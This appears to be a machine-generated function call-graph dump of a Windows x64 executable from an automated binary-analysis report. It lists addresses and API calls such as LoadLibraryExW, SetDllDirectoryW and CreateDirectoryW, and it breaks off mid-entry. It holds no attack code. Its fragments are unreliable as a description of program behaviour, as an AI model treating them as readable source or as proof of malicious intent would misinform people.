_fread_nolock MultiByteToWideChar 19893->19894 19897 7ff6d92678db 19894->19897 19895 7ff6d9267b59 19896 7ff6d924c550 _log10_special 8 API calls 19895->19896 19898 7ff6d92621d6 19896->19898 19897->19895 19899 7ff6d925d5fc _fread_nolock 12 API calls 19897->19899 19900 7ff6d9267a11 19897->19900 19902 7ff6d9267913 19897->19902 19898->19886 19899->19902 19900->19895 19901 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19900->19901 19901->19895 19902->19900 19903 7ff6d925f8a0 _fread_nolock MultiByteToWideChar 19902->19903 19904 7ff6d9267986 19903->19904 19904->19900 19923 7ff6d925f0e4 19904->19923 19907 7ff6d9267a22 19909 7ff6d925d5fc _fread_nolock 12 API calls 19907->19909 19911 7ff6d9267af4 19907->19911 19912 7ff6d9267a40 19907->19912 19908 7ff6d92679d1 19908->19900 19910 7ff6d925f0e4 __crtLCMapStringW 6 API calls 19908->19910 19909->19912 19910->19900 19911->19900 19913 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19911->19913 19912->19900 19914 7ff6d925f0e4 __crtLCMapStringW 6 API calls 19912->19914 19913->19900 19915 7ff6d9267ac0 19914->19915 19915->19911 19916 7ff6d9267af6 19915->19916 19917 7ff6d9267ae0 19915->19917 19919 7ff6d92607e8 WideCharToMultiByte 19916->19919 19918 7ff6d92607e8 WideCharToMultiByte 19917->19918 19920 7ff6d9267aee 19918->19920 19919->19920 19920->19911 19921 7ff6d9267b0e 19920->19921 19921->19900 19922 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19921->19922 19922->19900 19924 7ff6d925ed10 __crtLCMapStringW 5 API calls 19923->19924 19925 7ff6d925f122 19924->19925 19926 7ff6d925f12a 19925->19926 19929 7ff6d925f1d0 19925->19929 19926->19900 19926->19907 19926->19908 19928 7ff6d925f193 LCMapStringW 19928->19926 19930 7ff6d925ed10 __crtLCMapStringW 5 API calls 19929->19930 19931 7ff6d925f1fe __crtLCMapStringW 19930->19931 19931->19928 19934 7ff6d92662d8 19933->19934 19935 7ff6d92662c1 19933->19935 19934->19935 19937 7ff6d92662e6 19934->19937 19936 
7ff6d9254f08 _get_daylight 11 API calls 19935->19936 19938 7ff6d92662c6 19936->19938 19940 7ff6d9254f4c 45 API calls 19937->19940 19941 7ff6d92662d1 19937->19941 19939 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 19938->19939 19939->19941 19940->19941 19941->19616 19943 7ff6d9254f4c 45 API calls 19942->19943 19944 7ff6d9268f71 19943->19944 19947 7ff6d9268bc8 19944->19947 19949 7ff6d9268c16 19947->19949 19948 7ff6d924c550 _log10_special 8 API calls 19950 7ff6d9267205 19948->19950 19951 7ff6d9268c9d 19949->19951 19953 7ff6d9268c88 GetCPInfo 19949->19953 19956 7ff6d9268ca1 19949->19956 19950->19616 19950->19642 19952 7ff6d925f8a0 _fread_nolock MultiByteToWideChar 19951->19952 19951->19956 19954 7ff6d9268d35 19952->19954 19953->19951 19953->19956 19955 7ff6d925d5fc _fread_nolock 12 API calls 19954->19955 19954->19956 19957 7ff6d9268d6c 19954->19957 19955->19957 19956->19948 19957->19956 19958 7ff6d925f8a0 _fread_nolock MultiByteToWideChar 19957->19958 19959 7ff6d9268dda 19958->19959 19960 7ff6d925f8a0 _fread_nolock MultiByteToWideChar 19959->19960 19969 7ff6d9268ebc 19959->19969 19962 7ff6d9268e00 19960->19962 19961 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19961->19956 19963 7ff6d925d5fc _fread_nolock 12 API calls 19962->19963 19964 7ff6d9268e2d 19962->19964 19962->19969 19963->19964 19965 7ff6d925f8a0 _fread_nolock MultiByteToWideChar 19964->19965 19964->19969 19966 7ff6d9268ea4 19965->19966 19967 7ff6d9268eaa 19966->19967 19968 7ff6d9268ec4 19966->19968 19967->19969 19971 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19967->19971 19976 7ff6d925ef68 19968->19976 19969->19956 19969->19961 19971->19969 19973 7ff6d9268f03 19973->19956 19975 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19973->19975 19974 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19974->19973 19975->19956 19977 7ff6d925ed10 __crtLCMapStringW 5 API calls 19976->19977 19978 
7ff6d925efa6 19977->19978 19979 7ff6d925efae 19978->19979 19980 7ff6d925f1d0 __crtLCMapStringW 5 API calls 19978->19980 19979->19973 19979->19974 19981 7ff6d925f017 CompareStringW 19980->19981 19981->19979 19983 7ff6d9267c5a HeapSize 19982->19983 19984 7ff6d9267c41 19982->19984 19985 7ff6d9254f08 _get_daylight 11 API calls 19984->19985 19986 7ff6d9267c46 19985->19986 19987 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 19986->19987 19988 7ff6d9267c51 19987->19988 19988->19646 19990 7ff6d9267c89 19989->19990 19991 7ff6d9267c93 19989->19991 19993 7ff6d925d5fc _fread_nolock 12 API calls 19990->19993 19992 7ff6d9267c98 19991->19992 20000 7ff6d9267c9f _get_daylight 19991->20000 19994 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19992->19994 19997 7ff6d9267c91 19993->19997 19994->19997 19995 7ff6d9267cd2 HeapReAlloc 19995->19997 19995->20000 19996 7ff6d9267ca5 19998 7ff6d9254f08 _get_daylight 11 API calls 19996->19998 19997->19651 19998->19997 19999 7ff6d9263590 _get_daylight 2 API calls 19999->20000 20000->19995 20000->19996 20000->19999 20002 7ff6d925ed10 __crtLCMapStringW 5 API calls 20001->20002 20003 7ff6d925ef44 20002->20003 20003->19656 20005 7ff6d92554fa 20004->20005 20006 7ff6d92554d6 20004->20006 20007 7ff6d9255554 20005->20007 20008 7ff6d92554ff 20005->20008 20010 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20006->20010 20013 7ff6d92554e5 20006->20013 20009 7ff6d925f8a0 _fread_nolock MultiByteToWideChar 20007->20009 20011 7ff6d9255514 20008->20011 20008->20013 20014 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20008->20014 20020 7ff6d9255570 20009->20020 20010->20013 20015 7ff6d925d5fc _fread_nolock 12 API calls 20011->20015 20012 7ff6d9255577 GetLastError 20016 7ff6d9254e7c _fread_nolock 11 API calls 20012->20016 20013->19659 20013->19660 20014->20011 20015->20013 20019 7ff6d9255584 20016->20019 20017 7ff6d92555b2 20017->20013 20018 7ff6d925f8a0 _fread_nolock 
MultiByteToWideChar 20017->20018 20023 7ff6d92555f6 20018->20023 20024 7ff6d9254f08 _get_daylight 11 API calls 20019->20024 20020->20012 20020->20017 20021 7ff6d92555a5 20020->20021 20025 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20020->20025 20022 7ff6d925d5fc _fread_nolock 12 API calls 20021->20022 20022->20017 20023->20012 20023->20013 20024->20013 20025->20021 20027 7ff6d9259225 20026->20027 20034 7ff6d9259221 20026->20034 20047 7ff6d9262a3c GetEnvironmentStringsW 20027->20047 20030 7ff6d9259232 20032 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20030->20032 20031 7ff6d925923e 20054 7ff6d925938c 20031->20054 20032->20034 20034->19690 20039 7ff6d92595cc 20034->20039 20036 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20037 7ff6d9259265 20036->20037 20038 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20037->20038 20038->20034 20040 7ff6d92595ef 20039->20040 20045 7ff6d9259606 20039->20045 20040->19690 20041 7ff6d925f8a0 MultiByteToWideChar _fread_nolock 20041->20045 20042 7ff6d925eb98 _get_daylight 11 API calls 20042->20045 20043 7ff6d925967a 20044 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20043->20044 20044->20040 20045->20040 20045->20041 20045->20042 20045->20043 20046 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20045->20046 20046->20045 20048 7ff6d925922a 20047->20048 20049 7ff6d9262a60 20047->20049 20048->20030 20048->20031 20050 7ff6d925d5fc _fread_nolock 12 API calls 20049->20050 20051 7ff6d9262a97 memcpy_s 20050->20051 20052 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20051->20052 20053 7ff6d9262ab7 FreeEnvironmentStringsW 20052->20053 20053->20048 20055 7ff6d92593b4 20054->20055 20056 7ff6d925eb98 _get_daylight 11 API calls 20055->20056 20069 7ff6d92593ef 20056->20069 20057 7ff6d92593f7 20058 7ff6d925a948 
Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20057->20058 20059 7ff6d9259246 20058->20059 20059->20036 20060 7ff6d9259471 20061 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20060->20061 20061->20059 20062 7ff6d925eb98 _get_daylight 11 API calls 20062->20069 20063 7ff6d9259460 20064 7ff6d92594a8 11 API calls 20063->20064 20066 7ff6d9259468 20064->20066 20065 7ff6d9260474 37 API calls 20065->20069 20067 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20066->20067 20067->20057 20068 7ff6d9259494 20070 7ff6d925a900 _isindst 17 API calls 20068->20070 20069->20057 20069->20060 20069->20062 20069->20063 20069->20065 20069->20068 20071 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20069->20071 20072 7ff6d92594a6 20070->20072 20071->20069 20075 7ff6d9268b31 __crtLCMapStringW 20073->20075 20074 7ff6d92670ee 20074->19714 20074->19715 20075->20074 20076 7ff6d925ef68 6 API calls 20075->20076 20076->20074 20312 7ff6d924cb50 20313 7ff6d924cb60 20312->20313 20329 7ff6d9259ba8 20313->20329 20315 7ff6d924cb6c 20335 7ff6d924ce48 20315->20335 20317 7ff6d924d12c 7 API calls 20318 7ff6d924cc05 20317->20318 20319 7ff6d924cb84 _RTC_Initialize 20327 7ff6d924cbd9 20319->20327 20340 7ff6d924cff8 20319->20340 20321 7ff6d924cb99 20343 7ff6d9259014 20321->20343 20327->20317 20328 7ff6d924cbf5 20327->20328 20330 7ff6d9259bb9 20329->20330 20331 7ff6d9254f08 _get_daylight 11 API calls 20330->20331 20334 7ff6d9259bc1 20330->20334 20332 7ff6d9259bd0 20331->20332 20333 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 20332->20333 20333->20334 20334->20315 20336 7ff6d924ce59 20335->20336 20339 7ff6d924ce5e __scrt_acquire_startup_lock 20335->20339 20337 7ff6d924d12c 7 API calls 20336->20337 20336->20339 20338 7ff6d924ced2 20337->20338 20339->20319 20368 7ff6d924cfbc 20340->20368 20342 7ff6d924d001 20342->20321 20344 7ff6d9259034 20343->20344 20358 7ff6d924cba5 20343->20358 20345 7ff6d925903c 
20344->20345 20346 7ff6d9259052 GetModuleFileNameW 20344->20346 20347 7ff6d9254f08 _get_daylight 11 API calls 20345->20347 20350 7ff6d925907d 20346->20350 20348 7ff6d9259041 20347->20348 20349 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 20348->20349 20349->20358 20351 7ff6d9258fb4 11 API calls 20350->20351 20352 7ff6d92590bd 20351->20352 20353 7ff6d92590c5 20352->20353 20356 7ff6d92590dd 20352->20356 20354 7ff6d9254f08 _get_daylight 11 API calls 20353->20354 20355 7ff6d92590ca 20354->20355 20357 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20355->20357 20360 7ff6d925912b 20356->20360 20361 7ff6d9259144 20356->20361 20366 7ff6d92590ff 20356->20366 20357->20358 20358->20327 20367 7ff6d924d0cc InitializeSListHead 20358->20367 20359 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20359->20358 20362 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20360->20362 20364 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20361->20364 20363 7ff6d9259134 20362->20363 20365 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20363->20365 20364->20366 20365->20358 20366->20359 20369 7ff6d924cfd6 20368->20369 20371 7ff6d924cfcf 20368->20371 20372 7ff6d925a1ec 20369->20372 20371->20342 20375 7ff6d9259e28 20372->20375 20382 7ff6d92602d8 EnterCriticalSection 20375->20382 20383 7ff6d9259d50 20386 7ff6d9259ccc 20383->20386 20393 7ff6d92602d8 EnterCriticalSection 20386->20393 20500 7ff6d925afd0 20501 7ff6d925afd5 20500->20501 20502 7ff6d925afea 20500->20502 20506 7ff6d925aff0 20501->20506 20507 7ff6d925b032 20506->20507 20508 7ff6d925b03a 20506->20508 20509 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20507->20509 20510 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20508->20510 20509->20508 20511 7ff6d925b047 20510->20511 20512 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 
API calls 20511->20512 20513 7ff6d925b054 20512->20513 20514 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20513->20514 20515 7ff6d925b061 20514->20515 20516 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20515->20516 20517 7ff6d925b06e 20516->20517 20518 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20517->20518 20519 7ff6d925b07b 20518->20519 20520 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20519->20520 20521 7ff6d925b088 20520->20521 20522 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20521->20522 20523 7ff6d925b095 20522->20523 20524 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20523->20524 20525 7ff6d925b0a5 20524->20525 20526 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20525->20526 20527 7ff6d925b0b5 20526->20527 20532 7ff6d925ae94 20527->20532 20546 7ff6d92602d8 EnterCriticalSection 20532->20546 15895 7ff6d924cc3c 15916 7ff6d924ce0c 15895->15916 15898 7ff6d924cd88 16070 7ff6d924d12c IsProcessorFeaturePresent 15898->16070 15899 7ff6d924cc58 __scrt_acquire_startup_lock 15901 7ff6d924cd92 15899->15901 15903 7ff6d924cc76 __scrt_release_startup_lock 15899->15903 15902 7ff6d924d12c 7 API calls 15901->15902 15905 7ff6d924cd9d __CxxCallCatchBlock 15902->15905 15904 7ff6d924cc9b 15903->15904 15906 7ff6d924cd21 15903->15906 16059 7ff6d9259b2c 15903->16059 15922 7ff6d924d274 15906->15922 15908 7ff6d924cd26 15925 7ff6d9241000 15908->15925 15913 7ff6d924cd49 15913->15905 16066 7ff6d924cf90 15913->16066 15917 7ff6d924ce14 15916->15917 15918 7ff6d924ce20 __scrt_dllmain_crt_thread_attach 15917->15918 15919 7ff6d924cc50 15918->15919 15920 7ff6d924ce2d 15918->15920 15919->15898 15919->15899 15920->15919 16077 7ff6d924d888 15920->16077 16104 7ff6d926a4d0 15922->16104 15924 7ff6d924d28b GetStartupInfoW 15924->15908 15926 7ff6d9241009 15925->15926 16106 7ff6d9255484 
15926->16106 15928 7ff6d92437fb 16113 7ff6d92436b0 15928->16113 15934 7ff6d924383c 16273 7ff6d9241c80 15934->16273 15935 7ff6d924391b 16282 7ff6d92445c0 15935->16282 15939 7ff6d924385b 16185 7ff6d9248830 15939->16185 15942 7ff6d924396a 16305 7ff6d9242710 15942->16305 15944 7ff6d924388e 15952 7ff6d92438bb __std_exception_copy 15944->15952 16277 7ff6d92489a0 15944->16277 15946 7ff6d924395d 15947 7ff6d9243984 15946->15947 15948 7ff6d9243962 15946->15948 15950 7ff6d9241c80 49 API calls 15947->15950 16301 7ff6d925004c 15948->16301 15953 7ff6d92439a3 15950->15953 15954 7ff6d9248830 14 API calls 15952->15954 15961 7ff6d92438de __std_exception_copy 15952->15961 15958 7ff6d9241950 115 API calls 15953->15958 15954->15961 15956 7ff6d9243a0b 15957 7ff6d92489a0 40 API calls 15956->15957 15959 7ff6d9243a17 15957->15959 15960 7ff6d92439ce 15958->15960 15962 7ff6d92489a0 40 API calls 15959->15962 15960->15939 15963 7ff6d92439de 15960->15963 15967 7ff6d924390e __std_exception_copy 15961->15967 16316 7ff6d9248940 15961->16316 15964 7ff6d9243a23 15962->15964 15965 7ff6d9242710 54 API calls 15963->15965 15966 7ff6d92489a0 40 API calls 15964->15966 16007 7ff6d9243808 __std_exception_copy 15965->16007 15966->15967 15968 7ff6d9248830 14 API calls 15967->15968 15969 7ff6d9243a3b 15968->15969 15970 7ff6d9243b2f 15969->15970 15971 7ff6d9243a60 __std_exception_copy 15969->15971 15972 7ff6d9242710 54 API calls 15970->15972 15973 7ff6d9248940 40 API calls 15971->15973 15984 7ff6d9243aab 15971->15984 15972->16007 15973->15984 15974 7ff6d9248830 14 API calls 15975 7ff6d9243bf4 __std_exception_copy 15974->15975 15976 7ff6d9243c46 15975->15976 15977 7ff6d9243d41 15975->15977 15978 7ff6d9243c50 15976->15978 15979 7ff6d9243cd4 15976->15979 16332 7ff6d92444e0 15977->16332 16198 7ff6d92490e0 15978->16198 15982 7ff6d9248830 14 API calls 15979->15982 15986 7ff6d9243ce0 15982->15986 15983 7ff6d9243d4f 15987 7ff6d9243d71 15983->15987 15988 7ff6d9243d65 15983->15988 15984->15974 15989 7ff6d9243c61 
15986->15989 15992 7ff6d9243ced 15986->15992 15991 7ff6d9241c80 49 API calls 15987->15991 16335 7ff6d9244630 15988->16335 15994 7ff6d9242710 54 API calls 15989->15994 16001 7ff6d9243cc8 __std_exception_copy 15991->16001 15995 7ff6d9241c80 49 API calls 15992->15995 15994->16007 15998 7ff6d9243d0b 15995->15998 15996 7ff6d9243dc4 16248 7ff6d9249390 15996->16248 15998->16001 16002 7ff6d9243d12 15998->16002 16000 7ff6d9243dd7 SetDllDirectoryW 16006 7ff6d9243e0a 16000->16006 16049 7ff6d9243e5a 16000->16049 16001->15996 16003 7ff6d9243da7 SetDllDirectoryW LoadLibraryExW 16001->16003 16005 7ff6d9242710 54 API calls 16002->16005 16003->15996 16005->16007 16008 7ff6d9248830 14 API calls 16006->16008 16323 7ff6d924c550 16007->16323 16016 7ff6d9243e16 __std_exception_copy 16008->16016 16009 7ff6d9244008 16011 7ff6d9244035 16009->16011 16012 7ff6d9244012 PostMessageW GetMessageW 16009->16012 16010 7ff6d9243f1b 16253 7ff6d92433c0 16010->16253 16412 7ff6d9243360 16011->16412 16012->16011 16019 7ff6d9243ef2 16016->16019 16023 7ff6d9243e4e 16016->16023 16022 7ff6d9248940 40 API calls 16019->16022 16022->16049 16023->16049 16338 7ff6d9246dc0 16023->16338 16049->16009 16049->16010 16060 7ff6d9259b43 16059->16060 16061 7ff6d9259b64 16059->16061 16060->15906 18654 7ff6d925a3d8 16061->18654 16064 7ff6d924d2b8 GetModuleHandleW 16065 7ff6d924d2c9 16064->16065 16065->15913 16067 7ff6d924cfa1 16066->16067 16068 7ff6d924cd60 16067->16068 16069 7ff6d924d888 7 API calls 16067->16069 16068->15904 16069->16068 16071 7ff6d924d152 __CxxCallCatchBlock __scrt_get_show_window_mode 16070->16071 16072 7ff6d924d171 RtlCaptureContext RtlLookupFunctionEntry 16071->16072 16073 7ff6d924d19a RtlVirtualUnwind 16072->16073 16074 7ff6d924d1d6 __scrt_get_show_window_mode 16072->16074 16073->16074 16075 7ff6d924d208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16074->16075 16076 7ff6d924d256 __CxxCallCatchBlock 16075->16076 16076->15901 16078 7ff6d924d89a 16077->16078 16079 7ff6d924d890 
16077->16079 16078->15919 16083 7ff6d924dc24 16079->16083 16084 7ff6d924dc33 16083->16084 16085 7ff6d924d895 16083->16085 16091 7ff6d924de60 16084->16091 16087 7ff6d924dc90 16085->16087 16088 7ff6d924dcbb 16087->16088 16089 7ff6d924dc9e DeleteCriticalSection 16088->16089 16090 7ff6d924dcbf 16088->16090 16089->16088 16090->16078 16095 7ff6d924dcc8 16091->16095 16096 7ff6d924ddb2 TlsFree 16095->16096 16102 7ff6d924dd0c __vcrt_FlsAlloc 16095->16102 16097 7ff6d924dd3a LoadLibraryExW 16099 7ff6d924dd5b GetLastError 16097->16099 16100 7ff6d924ddd9 16097->16100 16098 7ff6d924ddf9 GetProcAddress 16098->16096 16099->16102 16100->16098 16101 7ff6d924ddf0 FreeLibrary 16100->16101 16101->16098 16102->16096 16102->16097 16102->16098 16103 7ff6d924dd7d LoadLibraryExW 16102->16103 16103->16100 16103->16102 16105 7ff6d926a4c0 16104->16105 16105->15924 16105->16105 16107 7ff6d925f480 16106->16107 16109 7ff6d925f526 16107->16109 16110 7ff6d925f4d3 16107->16110 16435 7ff6d925f358 16109->16435 16425 7ff6d925a814 16110->16425 16112 7ff6d925f4fc 16112->15928 16542 7ff6d924c850 16113->16542 16116 7ff6d92436eb GetLastError 16549 7ff6d9242c50 16116->16549 16117 7ff6d9243710 16544 7ff6d9249280 FindFirstFileExW 16117->16544 16121 7ff6d924377d 16575 7ff6d9249440 16121->16575 16122 7ff6d9243723 16564 7ff6d9249300 CreateFileW 16122->16564 16124 7ff6d924c550 _log10_special 8 API calls 16127 7ff6d92437b5 16124->16127 16127->16007 16135 7ff6d9241950 16127->16135 16128 7ff6d924378b 16132 7ff6d9242810 49 API calls 16128->16132 16134 7ff6d9243706 16128->16134 16129 7ff6d9243734 16567 7ff6d9242810 16129->16567 16131 7ff6d924374c __vcrt_FlsAlloc 16131->16121 16132->16134 16134->16124 16136 7ff6d92445c0 108 API calls 16135->16136 16137 7ff6d9241985 16136->16137 16138 7ff6d9241c43 16137->16138 16140 7ff6d9247f90 83 API calls 16137->16140 16139 7ff6d924c550 _log10_special 8 API calls 16138->16139 16141 7ff6d9241c5e 16139->16141 16142 7ff6d92419cb 16140->16142 16141->15934 16141->15935 16155 7ff6d9241a03 
17243->17288 17247 7ff6d92481dc 17246->17247 17248 7ff6d9249390 2 API calls 17247->17248 17249 7ff6d92481fb 17248->17249 17250 7ff6d9248216 ExpandEnvironmentStringsW 17249->17250 17251 7ff6d9248203 17249->17251 17252 7ff6d924823c __std_exception_copy 17250->17252 17253 7ff6d9242810 49 API calls 17251->17253 17254 7ff6d9248253 17252->17254 17255 7ff6d9248240 17252->17255 17277 7ff6d924820f __std_exception_copy 17253->17277 17259 7ff6d92482bf 17254->17259 17260 7ff6d9248261 GetDriveTypeW 17254->17260 17256 7ff6d9242810 49 API calls 17255->17256 17256->17277 17257 7ff6d924c550 _log10_special 8 API calls 17277->17257 17329 7ff6d9261558 17288->17329 17388 7ff6d92612d0 17329->17388 17409 7ff6d92602d8 EnterCriticalSection 17388->17409 17536 7ff6d924456a 17535->17536 17537 7ff6d9249390 2 API calls 17536->17537 17538 7ff6d924458f 17537->17538 17539 7ff6d924c550 _log10_special 8 API calls 17538->17539 17540 7ff6d92445b7 17539->17540 17540->16265 17542 7ff6d9247e2e 17541->17542 17543 7ff6d9241c80 49 API calls 17542->17543 17546 7ff6d9247f52 17542->17546 17549 7ff6d9247eb5 17543->17549 17544 7ff6d924c550 _log10_special 8 API calls 17545 7ff6d9247f83 17544->17545 17545->16265 17546->17544 17547 7ff6d9241c80 49 API calls 17547->17549 17548 7ff6d9244560 10 API calls 17548->17549 17549->17546 17549->17547 17549->17548 17550 7ff6d9249390 2 API calls 17549->17550 17551 7ff6d9247f23 CreateDirectoryW 17550->17551 17551->17546 17551->17549 17553 7ff6d9241637 17552->17553 17554 7ff6d9241613 17552->17554 17556 7ff6d92445c0 108 API calls 17553->17556 17675 7ff6d9241050 17554->17675 17558 7ff6d924164b 17556->17558 17557 7ff6d9241618 17561 7ff6d924162e 17557->17561 17564 7ff6d9242710 54 API calls 17557->17564 17559 7ff6d9241653 17558->17559 17560 7ff6d9241682 17558->17560 17562 7ff6d9254f08 _get_daylight 11 API calls 17559->17562 17563 7ff6d92445c0 108 API calls 17560->17563 17561->16265 17565 7ff6d9241658 17562->17565 17566 7ff6d9241696 17563->17566 17564->17561 17567 7ff6d9242910 54 API 
calls 17565->17567 17568 7ff6d92416b8 17566->17568 17569 7ff6d924169e 17566->17569 17570 7ff6d9241671 17567->17570 17572 7ff6d92506d4 73 API calls 17568->17572 17571 7ff6d9242710 54 API calls 17569->17571 17570->16265 17573 7ff6d92416ae 17571->17573 17574 7ff6d92416cd 17572->17574 17579 7ff6d925004c 74 API calls 17573->17579 17575 7ff6d92416f9 17574->17575 17576 7ff6d92416d1 17574->17576 17601 7ff6d924718b 17600->17601 17603 7ff6d9247144 17600->17603 17601->16265 17603->17601 17743 7ff6d9255024 17603->17743 17605 7ff6d92441a1 17604->17605 17606 7ff6d92444e0 49 API calls 17605->17606 17607 7ff6d92441db 17606->17607 17608 7ff6d92444e0 49 API calls 17607->17608 17609 7ff6d92441eb 17608->17609 17610 7ff6d924420d 17609->17610 17611 7ff6d924423c 17609->17611 17774 7ff6d9244110 17610->17774 17613 7ff6d9244110 51 API calls 17611->17613 17614 7ff6d924423a 17613->17614 17615 7ff6d9244267 17614->17615 17616 7ff6d924429c 17614->17616 17781 7ff6d9247cf0 17615->17781 17617 7ff6d9244110 51 API calls 17616->17617 17620 7ff6d92442c0 17617->17620 17649 7ff6d9241c80 49 API calls 17648->17649 17650 7ff6d9244474 17649->17650 17650->16265 17650->17650 17676 7ff6d92445c0 108 API calls 17675->17676 17677 7ff6d924108c 17676->17677 17678 7ff6d92410a9 17677->17678 17679 7ff6d9241094 17677->17679 17681 7ff6d92506d4 73 API calls 17678->17681 17680 7ff6d9242710 54 API calls 17679->17680 17687 7ff6d92410a4 __std_exception_copy 17680->17687 17682 7ff6d92410bf 17681->17682 17683 7ff6d92410e6 17682->17683 17684 7ff6d92410c3 17682->17684 17689 7ff6d92410f7 17683->17689 17690 7ff6d9241122 17683->17690 17685 7ff6d9254f08 _get_daylight 11 API calls 17684->17685 17686 7ff6d92410c8 17685->17686 17688 7ff6d9242910 54 API calls 17686->17688 17687->17557 17698 7ff6d92410e1 __std_exception_copy 17688->17698 17691 7ff6d9254f08 _get_daylight 11 API calls 17689->17691 17692 7ff6d9241129 17690->17692 17697 7ff6d924113c 17690->17697 17693 7ff6d9241100 17691->17693 17694 7ff6d9241210 92 API calls 17692->17694 
17694->17698 17697->17698 17700 7ff6d925039c _fread_nolock 53 API calls 17697->17700 17700->17697 17744 7ff6d925505e 17743->17744 17745 7ff6d9255031 17743->17745 17747 7ff6d9255081 17744->17747 17750 7ff6d925509d 17744->17750 17746 7ff6d9254f08 _get_daylight 11 API calls 17745->17746 17752 7ff6d9254fe8 17745->17752 17748 7ff6d925503b 17746->17748 17749 7ff6d9254f08 _get_daylight 11 API calls 17747->17749 17751 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 17748->17751 17753 7ff6d9255086 17749->17753 17758 7ff6d9254f4c 17750->17758 17755 7ff6d9255046 17751->17755 17752->17603 17756 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 17753->17756 17755->17603 17757 7ff6d9255091 17756->17757 17757->17603 17759 7ff6d9254f70 17758->17759 17765 7ff6d9254f6b 17758->17765 17760 7ff6d925b150 __CxxCallCatchBlock 45 API calls 17759->17760 17759->17765 17761 7ff6d9254f8b 17760->17761 17766 7ff6d925d984 17761->17766 17765->17757 17767 7ff6d925d999 17766->17767 17768 7ff6d9254fae 17766->17768 17767->17768 17775 7ff6d9244136 17774->17775 17776 7ff6d9254984 49 API calls 17775->17776 17777 7ff6d924415c 17776->17777 17838 7ff6d9255ec8 17837->17838 17839 7ff6d9255eee 17838->17839 17842 7ff6d9255f21 17838->17842 17840 7ff6d9254f08 _get_daylight 11 API calls 17839->17840 17841 7ff6d9255ef3 17840->17841 17843 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 17841->17843 17844 7ff6d9255f27 17842->17844 17845 7ff6d9255f34 17842->17845 17855 7ff6d9244616 17843->17855 17846 7ff6d9254f08 _get_daylight 11 API calls 17844->17846 17856 7ff6d925ac28 17845->17856 17846->17855 17855->16290 17869 7ff6d92602d8 EnterCriticalSection 17856->17869 18229 7ff6d92578f8 18228->18229 18232 7ff6d92573d4 18229->18232 18231 7ff6d9257911 18231->16298 18233 7ff6d925741e 18232->18233 18234 7ff6d92573ef 18232->18234 18242 7ff6d925546c EnterCriticalSection 18233->18242 18236 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 18234->18236 18238 7ff6d925740f 18236->18238 18238->18231 18244 7ff6d924fe43 
18243->18244 18245 7ff6d924fe71 18243->18245 18246 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 18244->18246 18252 7ff6d924fe63 18245->18252 18253 7ff6d925546c EnterCriticalSection 18245->18253 18246->18252 18252->16304 18255 7ff6d924caf2 RtlLookupFunctionEntry 18254->18255 18256 7ff6d924cb08 RtlVirtualUnwind 18255->18256 18257 7ff6d924c90b 18255->18257 18256->18255 18256->18257 18258 7ff6d924c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18257->18258 18260 7ff6d92445c0 108 API calls 18259->18260 18261 7ff6d9241493 18260->18261 18262 7ff6d92414bc 18261->18262 18263 7ff6d924149b 18261->18263 18265 7ff6d92506d4 73 API calls 18262->18265 18264 7ff6d9242710 54 API calls 18263->18264 18266 7ff6d92414ab 18264->18266 18267 7ff6d92414d1 18265->18267 18266->16346 18268 7ff6d92414f8 18267->18268 18269 7ff6d92414d5 18267->18269 18273 7ff6d9241508 18268->18273 18274 7ff6d9241532 18268->18274 18270 